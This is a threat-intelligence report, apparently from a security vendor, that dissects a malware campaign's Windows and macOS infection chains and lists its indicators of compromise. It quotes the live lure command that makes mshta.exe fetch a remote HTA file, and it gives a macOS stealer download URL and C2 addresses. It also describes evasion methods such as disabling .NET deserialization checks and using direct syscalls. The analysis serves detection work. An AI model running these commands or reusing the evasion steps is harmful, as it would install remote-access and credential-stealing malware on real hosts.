This is the full technical companion to our campaign overview published in Part 1. It documents the Windows and macOS malware chains in detail, and provides the complete indicator of compromise list for threat hunting and detection rule development.
The Windows infection chain is initiated by a single terminal command:
C:\Windows\SysWOW64\mshta.exe https://kimi.install-files.com/kimi
This invokes mshta.exe — a legitimate Windows system binary for executing HTML Application (.hta) files with local system-level privileges. Because it is a trusted Windows component, it bypasses most application allowlisting controls. Here it is used to remotely load a malicious HTA file from attacker-controlled infrastructure.
Obfuscation Layer
The HTA file defines AutoOpen as its entry point — but the entry point is defined ten times. Under standard programming conventions, only the final definition is effective; however, each of the ten definitions references different variables, different hex decoding functions, and different Base64 decoding functions. All implement the same underlying deserialization-and-execute logic. The repetition is not redundancy — it is deliberate obfuscation designed to exhaust static analysis and defeat pattern-matching detection.
.NET Deserialization Chain
The final AutoOpen definition invokes a function that uses hex decoding to decrypt a string, creates a WScript.Shell object via CreateObject, and retrieves the process environment. It then constructs an inline XML manifest in memory, registers a .NET type, and uses CreateObject with an activation context to instantiate a BinaryFormatter — entirely in memory, without triggering a .NET installation interface.
Two payloads are deserialized from embedded Base64-encoded data. The first (approximately 2,225 bytes) disables ActivitySurrogateSelector type-checking — a .NET security control that restricts untrusted objects from participating in deserialization — via an embedded XAML directive. This is a necessary prerequisite for the second payload. The second payload (approximately 170,000 bytes) uses System.Windows.Forms.AxHost+State as an outer wrapper, loading a .NET module named Share (compiled February 25, 2026) into memory.
Shellcode and Final Payload
Share extracts and decrypts data from an embedded resource section, producing a second .NET module, Ethics. Ethics decrypts two architecture-specific shellcode payloads from its own resource section, selects the appropriate one, writes it to a memory region, marks it executable via VirtualProtect, and invokes it through .NET's delegate mechanism.
The shellcode is itself a loader. Its entry instruction jumps past 102,628 bytes of encrypted data to a decryption stub at the payload's end, which decrypts and executes the final stage.
The final payload is a remote access trojan compiled February 25, 2026. Its import table has been deliberately stripped; it uses direct NT syscalls internally to bypass EDR products that rely on userland API hook interception. Upon execution it connects to C2 at 144.124.235.102:443.
The macOS chain begins with a single Base64-encoded terminal command that decodes to a download URL:
http://jaxfamilylawyers.com/curl/515b7a4ebc1a925a99df8abd6ae508ffa971c9d97d6d595fa3f3cd6ee410d78d
The downloaded file is itself encoded; decoding produces a shell script. The shell script downloads and executes an AppleScript payload from the attacker's server. The payload identifies itself internally as MacSync Stealer v1.1.2 (release build).
Execution Sequence
Hyperlinks to IOCs lead to ThreatBook Investigator, where you can view details. Sample:
144.124.235.102:443
45.94.47.204:80
Detection and protection for this campaign is in place across ThreatBook products. Organizations that identify any of the above IOCs in their environment should treat affected hosts as compromised and initiate incident response procedures immediately.
Contact ThreatBook to learn more about how we can help you in AI application threat detection.